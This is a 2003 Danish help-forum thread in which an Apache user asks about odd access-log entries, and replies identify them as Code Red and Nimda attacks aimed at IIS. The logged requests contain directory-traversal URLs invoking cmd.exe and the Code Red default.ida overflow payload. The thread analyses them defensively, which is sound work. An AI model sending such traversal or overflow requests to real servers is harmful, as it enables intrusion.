Søg
Avatar billede jonas82 Nybegynder
04. august 2003 - 15:37 Der er 1 kommentar og
2 løsninger

Spørgsmål til apache log

Sad lige og kiggede lidt i min log fil fra min apache server (debian) hvor jeg stødte på en del jeg synes så underligt ud - nogen der ved hvad dette betyder:

217.229.98.172 - - [04/Aug/2003:02:09:44 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.1" 404 314 "-" "-"

217.229.98.172 - - [04/Aug/2003:02:09:44 +0200] "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.1" 404 317 "-" "-"

218.68.171.143 - - [04/Aug/2003:02:36:32 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 270 "-" "-"

Der er en hel del af den slags, og umiddelbart ved jeg ikke hvad det er, men det ser lidt lusket ud.
Avatar billede snowball Novice
04. august 2003 - 15:43 #1
Det er et forsøg på at afvikle Code Red virus'en på din server, men da du kører med Apache og ikke IIS, har du ikke noget at frygte.

Snowball
Avatar billede jonas82 Nybegynder
04. august 2003 - 16:05 #2
Er det den med cmd.exe eller default.ida - eller er begge dele en del af code red..?
Avatar billede htm Nybegynder
04. august 2003 - 16:41 #3
Ja det er begge CodeRed eller Nimda etc. Men er ganske harmløse på dit system. Den rammer IIS servere.

Prøv evt. og sammelign din error_log med din access_log så vil du se at der dannes en linie i din error_log for hver af de linier!

Læs evt. her også:
http://www.thesitewizard.com/news/coderediiworm.shtml
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
It-udvikling & AI kurser
Uanset kodesprog, så giver vi dig mulighederne for at udvikle det, du behøver.
Se alle It-udvikling & AI kurser

Flere spørgsmål fra Webservere kategorien

Titel Indlæg Oprettet Seneste aktivitet
HTML-LINKS Af snestrup2000 i Webservere 2 16/11/202415:33 16/11/202418:41
Wordpress fejl Action Scheduler ? Af fimo i Webservere 2 24/10/202410:16 27/10/202412:07
My Cloud Home (hjemme server) Af Erik Hovedskou i Webservere 13 19/10/202419:51 20/10/202419:35
Periodisk lang responstid Af AlbertK i Webservere 3 23/08/202415:54 24/08/202421:48
Yousee Af nu_igen i Webservere 1 08/04/202408:21 09/04/202409:44
Se alle spørgsmål i kategorien Opret spørgsmål

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Opret Log ind

Du kan også logge ind via nedenstående tjenester

Alle kategorier på Eksperten
Seneste spørgsmål Seneste aktivitet
I dag 09:07 CCleaner licens Af Slawomir i Andet software
I går 23:17 PC kan kun boote direkte i bios Af kurtba i PC
I går 09:15 Systemgendannelse Af barth i Andet software
30/1114:46 Samsung telefon med problemer Af erikjacobsen i Mobiltelefoner
29/1121:14 Skifte Processor ? :) Af Suldrup i Andet software
White papers
Flere white papers »